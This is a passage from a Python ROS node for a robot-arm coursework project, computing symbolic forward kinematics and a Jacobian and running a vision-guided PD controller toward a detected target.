    theta0, theta1, theta2, theta3, r0, r1, r2, r3, alpha0, alpha1, alpha2, alpha3, d0, d1, d2, d3 = symbols('theta0 theta1 theta2 theta3 r0 r1 r2 r3 alpha0 alpha1 alpha2 alpha3 d0 d1 d2 d3')
    # Fixed DH parameters of this arm: link lengths 3.5 and 3, base offset 2.5.
    rs = [0,0,3.5,3]
    alphas = np.deg2rad([-90,-90,-90,0])
    ds = [2.5, 0, 0,0]
    matrix0 = (self.dh_matrix_sym(d0, theta0, alpha0, r0))
    matrix1 = (self.dh_matrix_sym(d1, theta1, alpha1, r1))
    matrix2 = (self.dh_matrix_sym(d2, theta2, alpha2, r2))
    matrix3 = (self.dh_matrix_sym(d3, theta3, alpha3, r3))
    finalMatrix = (((matrix0 * matrix1) * matrix2) * matrix3)
    jacobian = (finalMatrix.col(3).jacobian(Matrix([theta0, theta1, theta2, theta3])))
    jacobian = (jacobian.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
    jacobian = (jacobian.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
    jacobian = (jacobian.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
    finalMatrix = (finalMatrix.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
    finalMatrix = (finalMatrix.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
    finalMatrix = (finalMatrix.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
    return finalMatrix,jacobian, [theta0, theta1, theta2, theta3]
  def sub_thetas(self,matrix, thetas):
    """Substitute concrete joint angles for the cached theta symbols."""
    matrix = (matrix.subs([(self.symThetas[0] ,thetas[0]), (self.symThetas[1] ,thetas[1]),(self.symThetas[2] ,thetas[2]),(self.symThetas[3] ,thetas[3])]))
    return matrix
  def sub_mat_jacobian(self, matrix):
    """Jacobian of the matrix's position column w.r.t. the theta symbols."""
    jacobian = (matrix.col(3).jacobian(Matrix([self.symThetas[0], self.symThetas[1], self.symThetas[2], self.symThetas[3]])))
    return jacobian
  def forward_kinematics(self, ds, thetas, alphas, rs):
    """Numeric FK product of the four DH transforms.

    NOTE(review): calls dh_matrix without self. — this would raise
    NameError if ever invoked; the method appears unused (the live code
    path uses the symbolic make_matrix/sub_thetas instead).
    """
    final_matrix = np.eye(4,4)
    matrix0 = dh_matrix(ds[0],thetas[0], alphas[0], rs[0])
    matrix1 = dh_matrix(ds[1],thetas[1], alphas[1], rs[1])
    matrix2 = dh_matrix(ds[2],thetas[2], alphas[2], rs[2])
    matrix3 = dh_matrix(ds[3],thetas[3], alphas[3], rs[3])
    return ((matrix0.dot(matrix1)).dot(matrix2)).dot(matrix3)
  def end_effector_estimate(self, jas):
    """Evaluate the cached symbolic FK at the given joint angles.

    Applies the fixed DH theta offsets [-90, 90, 180, 0] deg before
    substitution.  Returns (ee_position[3], fk_matrix, jacobian).
    """
    thetas= np.deg2rad([-90,90,180,0]) +jas
    numMatrix = self.sub_thetas((Matrix(self.fkmatrix)), thetas)
    jac = self.sub_thetas((Matrix(self.fkjacobian)), thetas)
    #numMatrix, jacobian = (self.sym_forward_kinametics(ds,thetas, alphas,rs))
    # Translation column of the homogeneous transform = end-effector xyz.
    ee_pos = (np.array(numMatrix).astype(np.float64))[:,3][:3]
    return ee_pos, numMatrix, jac
  def control_closed(self,jas, img1, img2):
    """One PD closed-loop control step toward the detected target.

    Given the current joint angles *jas* and both camera images,
    computes the end-effector position error to the target, maps it
    through the (pseudo-inverted) position Jacobian to joint
    velocities, clamps them to ±1 rad/s, and returns the next joint
    angle command q_d.
    """
    ds = [2.5, 0, 0,0]
    thetas= np.deg2rad([-90,90,180,0]) + jas
    rs = [0,0,3.5,3]
    alphas = np.deg2rad([-90,-90,-90,0])
    # P gain
    K_p = np.array([[1.6,0,0],[0,1.6,0], [0,0,1.6]])
    # D gain
    K_d = np.array([[0.4,0,0],[0,0.4,0],[0,0,0.4]])
    # estimate time step
    cur_time = np.array([rospy.get_time()])
    dt = cur_time - self.time_previous_step
    self.time_previous_step = cur_time
    # robot end-effector position
    pos, numMatrix, jacobian = self.end_effector_estimate(jas)
    # Shift from the FK frame (origin at base, z up) to image frame:
    # flip z and translate by the detected yellow (base) joint.
    newOrig = self.detect3dyellow(self.cv_image1, self.cv_image2)
    pos = np.array([pos[0], pos[1], -pos[2]])
    pos = pos + newOrig
    # THIS NEEDS TO BE SPHERE POSITION
    pos_d= self.detect3dtarget(img1, img2) #np.array([self.targetXpos,self.targetYpos, self.targetZpos]) #
    self.ee_pos_x.publish(pos[0])
    self.ee_pos_y.publish(pos[1])
    self.ee_pos_z.publish(pos[2])
    error = pos_d - pos
    error = np.array([error[0], error[1], -error[2]])
    # estimate derivative of error
    self.error_d = ((error) - self.error)/dt
    # estimate error
    self.error = error
    #print(self.error)
    q = jas
    #print(jacobian)
    # Position rows only; joint 1 is held fixed, so zero its column.
    jacobian = np.round(np.array(jacobian).astype(np.float64),6)[0:3,:]
    jacobian[:,0] = np.array([0,0,0])
    #print(jacobian)
    J_inv = np.zeros((4,4))
    #sympy.pprint(np.round(np.array(jacobian).astype(np.float64).reshape((3,4)), 6))
    try:
      J_inv = np.round(np.linalg.pinv(jacobian),6)# calculating the MP psudeo inverse of Jacobian
    except np.linalg.LinAlgError as e:
      # Degenerate Jacobian: fall back to a random inverse to escape the singularity.
      J_inv = np.random.rand(4,3)
    #print(J_inv)
    dq_d =np.dot(J_inv, ( np.dot(K_d,self.error_d.transpose()) + np.dot(K_p,self.error.transpose()) ) ) # control input (angular velocity of joints)
    # Clamp joint velocities to +/- 1 rad/s.
    for i in range(len(dq_d)):
      if dq_d[i] > 1:
        dq_d[i] = 1
      if dq_d[i] < -1:
        dq_d[i] = -1
    q_d = q + (dt * dq_d) # control input (angular position of joints)
    #print(q_d)
    return q_d
  def jointscallback(self, data1, data2, data3):
    """Record the last commanded joint angles (joint 1 assumed 0)."""
    self.actualJoints = np.array([0, data1.data, data2.data, data3.data])
  def callback(self, data1, data2):
    """Synchronised image callback: convert both ROS images, lazily
    build the symbolic FK, run one control step, and publish the
    vision-estimated joint angles."""
    try:
      self.cv_image1 = self.bridge.imgmsg_to_cv2(data1, "bgr8")
      self.cv_image2 = self.bridge.imgmsg_to_cv2(data2, "bgr8")
    except CvBridgeError as e:
      print(e)
    # Build the symbolic FK matrix/Jacobian on the first callback only.
    if (self.fkmatrix == Matrix([0])):
      self.fkmatrix,self.fkjacobian, self.symThetas = self.make_matrix()
    jointsData = np.array([0,0,0,0])
    q_d = np.array([0,0,0,0])
    self.joints = Float64MultiArray()
    q_d = self.control_closed(self.actualJoints,self.cv_image1, self.cv_image2)
    jas = self.jointangles(self.cv_image1, self.cv_image2)
    #self.oldq = q_d
    #jas = [-1,0.1,0.7,1.5]
    #self.oldq = q_d
    #ds = [2.5, 0, 0,0]
    #thetas= np.deg2rad([-90,90,180,0]) + jas
    #rs = [0,0,3.5,3]
    #alphas = np.deg2rad([-90,-90,-90,0])
    #ee_pos, numMatrix, jacobian = self.end_effector_estimate(jas)
    #newOrig = self.detect3dyellow(self.cv_image1, self.cv_image1)
    #ee_pos = [ee_pos[0], ee_pos[1], -ee_pos[2]]
    #ee_pos = newOrig + ee_pos
    try:
      self.robot_joint2_estimated_pub.publish(jas[1])
      self.robot_joint3_estimated_pub.publish(jas[2])
      self.robot_joint4_estimated_pub.publish(jas[3])
      #self.robot_joint1_pub.publish(0)
      #self.robot_joint2_pub.publish(q_d[1])
      #self.robot_joint3_pub.publish(q_d[2])
      #self.robot_joint4_pub.publish(q_d[3])
    except CvBridgeError as e:
      print(e)
    #print(ee_pos)
    #target = self.detect3dtarget(self.cv_image1,self.cv_image2)
    #target = [target[0], target[1], -target[2]]
    #print(target)
    #red = self.detect3dred(self.cv_image1, self.cv_image2)
    #print(newOrig)
    #print(red)
    #print(np.linalg.norm(red - ee_pos))
    #print(target - ee_pos)
# call the class
def main(args):
    """Instantiate the estimator node and process callbacks until shutdown."""
    _node = angle_estimator()  # keep a reference so callbacks stay registered
    try:
        rospy.spin()
    except KeyboardInterrupt:
        print("Shutting down")
# run the code if the node is called
if __name__ == '__main__':
    main(sys.argv)  # forward CLI args (currently unused by main)
| TheCopperMind/IVR_CW1 | src/joint_state_estimation.py | joint_state_estimation.py | py | 15,311 | python | en | code | 1 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.